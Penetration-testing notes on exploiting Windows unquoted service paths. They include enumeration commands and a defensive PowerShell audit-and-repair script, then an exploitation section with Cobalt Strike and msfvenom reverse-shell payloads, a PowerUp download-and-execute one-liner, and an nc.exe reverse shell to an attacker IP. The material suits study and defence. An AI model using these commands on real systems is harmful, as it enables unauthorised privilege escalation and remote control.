Unquoted Service Paths
If we find a service running as SYSTEM/Administrator whose binary path is unquoted and contains spaces, we can hijack the path and use it to elevate privileges. This works because, when the path is not quoted, Windows treats each space as a possible end of the executable name and tries each of those intermediate binaries in order before reaching the real one.
For example, the following path would be vulnerable:
C:\Program Files\something\winamp.exe
We could place our payload with any of the following paths:
C:\Program.exe
C:\Program Files.exe
1. The following commands will display affected services:
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" |findstr /i /v """
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
sc query
sc qc <ServiceName>
Then to check permissions on that path:
powershell -c "Get-Acl -Path 'C:\Program Files\Vulnerable Services' | fl"
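The one-liners above only list candidate services; confirming a finding means working out which intermediate paths Windows would probe and whether a low-privileged principal can create a file there. The following PowerShell audit script is an added example, not part of the original notes or of any tool mentioned on this page. It enumerates services through Win32_Service, derives the candidate paths (each prefix of the unquoted path that ends just before a space, with ".exe" appended, which is the order CreateProcess tries them in), checks the parent directory ACL for file-creation rights, and includes a repair function that writes the quoted path back to the service's ImagePath. The group list in $LowPrivGroups and the function names are assumptions; adjust the list for the principals you care about (and for non-English account names).

```powershell
# Added audit script (not from the original notes). Enumerates services whose
# PathName is unquoted and contains spaces, lists the intermediate executables
# CreateProcess would probe (each prefix ending before a space, plus ".exe"),
# and reports whether a low-privileged principal can create files in the
# directory that would hold each candidate. Run elevated for complete ACL
# reads. $LowPrivGroups is an assumption: adjust to the principals you audit.

$LowPrivGroups = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

function Get-ServiceExeAndArgs {
    # Split a raw service PathName into executable and arguments.
    param([Parameter(Mandatory)][string]$PathName)
    $p = $PathName.Trim()
    if ($p.StartsWith('"')) {
        $end = $p.IndexOf('"', 1)
        if ($end -lt 0) { $end = $p.Length }                # unterminated quote
        $rest = if ($end + 1 -lt $p.Length) { $p.Substring($end + 1) } else { '' }
        return [pscustomobject]@{ Exe = $p.Substring(1, $end - 1); Args = $rest; Quoted = $true }
    }
    # Unquoted: the executable is the shortest prefix ending in ".exe"
    $m = [regex]::Match($p, '^(.+?\.exe)(\s.*)?$', 'IgnoreCase')
    if ($m.Success) {
        return [pscustomobject]@{ Exe = $m.Groups[1].Value; Args = $m.Groups[2].Value; Quoted = $false }
    }
    [pscustomobject]@{ Exe = $p; Args = ''; Quoted = $false }
}

function Get-HijackCandidates {
    # For an unquoted path, CreateProcess tries each prefix that ends just
    # before a space, with ".exe" appended, before reaching the real binary.
    param([Parameter(Mandatory)][string]$Exe)
    $out = @()
    for ($i = 0; $i -lt $Exe.Length; $i++) {
        if ($Exe[$i] -eq ' ') { $out += ($Exe.Substring(0, $i) + '.exe') }
    }
    return $out
}

function Test-LowPrivCreateFiles {
    # True if an Allow ACE grants a $LowPrivGroups member the right to create
    # files in $Directory (WriteData/CreateFiles, or GENERIC_WRITE/GENERIC_ALL).
    # Deny ACEs are not evaluated, so treat a hit as a lead to confirm by hand.
    param([Parameter(Mandatory)][string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory)) { return $false }
    try { $acl = Get-Acl -LiteralPath $Directory } catch { return $false }
    foreach ($rule in $acl.Access) {
        if ($rule.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivGroups -notcontains $rule.IdentityReference.Value) { continue }
        # InheritOnly (2) ACEs apply to children only, not to this folder itself
        if (([int]$rule.PropagationFlags -band 2) -ne 0) { continue }
        $r = [int]$rule.FileSystemRights
        # 0x2 = WriteData/CreateFiles, 0x40000000 = GENERIC_WRITE, 0x10000000 = GENERIC_ALL
        if (($r -band 0x2) -ne 0 -or ($r -band 0x40000000) -ne 0 -or ($r -band 0x10000000) -ne 0) {
            return $true
        }
    }
    return $false
}

function Get-UnquotedServicePathFinding {
    # One row per (service, candidate path); rows with Writable = True are the findings.
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        if (-not $_.PathName) { return }
        $split = Get-ServiceExeAndArgs -PathName $_.PathName
        if ($split.Quoted -or -not $split.Exe.Contains(' ')) { return }
        foreach ($cand in Get-HijackCandidates -Exe $split.Exe) {
            [pscustomobject]@{
                Service   = $_.Name
                StartMode = $_.StartMode
                RunsAs    = $_.StartName
                Candidate = $cand
                Writable  = Test-LowPrivCreateFiles -Directory (Split-Path -Path $cand -Parent)
            }
        }
    }
}

function Repair-UnquotedServicePath {
    # Rewrites ImagePath with the executable quoted, keeping any arguments.
    # Use -WhatIf first. The value read back is already expanded, so any %VAR%
    # references are written back expanded; the type stays REG_EXPAND_SZ.
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory)][string]$Name)
    $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$Name"
    $raw = (Get-ItemProperty -Path $key -Name ImagePath).ImagePath
    $split = Get-ServiceExeAndArgs -PathName $raw
    if ($split.Quoted) { return }
    $fixed = '"{0}"{1}' -f $split.Exe, $split.Args
    if ($PSCmdlet.ShouldProcess($Name, "set ImagePath to $fixed")) {
        Set-ItemProperty -Path $key -Name ImagePath -Value $fixed -Type ExpandString
    }
}

Get-UnquotedServicePathFinding | Format-Table -AutoSize
```

Dot-source the script, then `Get-UnquotedServicePathFinding | Where-Object Writable` gives the rows worth acting on; for each, `Repair-UnquotedServicePath -Name <ServiceName> -WhatIf` shows the quoted ImagePath that would be written, and the same call without -WhatIf applies it (the service picks up the new path on its next start). On a default install the root of C:\ grants Authenticated Users only AppendData/AddSubdirectory, so a candidate such as C:\Program.exe is reported as not writable; the check tests the file-creation bit rather than any write-like right for exactly that reason.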
2. Exploit
Payloads to abuse services must be specific "service binaries", because they need to interact with the Service Control Manager. In Cobalt Strike, when using the "Generate All Payloads" option, these have svc in the filename.
Standard users cannot stop or start services by default, so you would usually need to wait for a computer reboot.
Manual:
cd C:\Program Files\Vulnerable Services
ls
cd C:\Program Files\Vulnerable Services
upload C:\Payloads\tcp-local_x64.svc.exe
mv tcp-local_x64.svc.exe Service.exe
ls
run sc stop VulnService1
run sc start VulnService1
To restore the service, simply delete Service.exe and restart the service.
Metasploit:
exploit/windows/local/trusted_service_path
PowerUp exploit
To find the vulnerable application:
C:\> powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://your-site.com/PowerUp.ps1'); Invoke-AllChecks"
...
[*] Checking for unquoted service paths...
ServiceName : BBSvc
Path : C:\Program Files\Microsoft\Bing Bar\7.1\BBSvc.exe
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -ServiceName 'BBSvc' -Path <HijackPath>
...
Automatic exploit
Invoke-ServiceAbuse -Name [SERVICE_NAME] -Command "..\..\Users\Public\nc.exe 10.10.10.10 4444 -e cmd.exe"
- Example:
Detection
powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"
[*] Checking for unquoted service paths...
ServiceName : unquotedsvc
Path : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
ModifiablePath : @{Permissions=AppendData/AddSubdirectory; ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'unquotedsvc' -Path <HijackPath>
CanRestart : True
or
winPEAS.exe
[+] Interesting Services -non Microsoft-(T1007)
unquotedsvc(Unquoted Path Service)[C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe] - Manual - Stopped - No quotes and Space detected
Exploitation
# Attacker
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > Common.exe
sudo python -m SimpleHTTPServer 80
sudo nc -lvp <PORT>
# Victim
cd "C:\Program Files\Unquoted Path Service\"
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://<IP>/Common.exe', '.\Common.exe')
Or, if the malicious binary has already been downloaded to another directory on the host:
copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
sc start unquotedsvc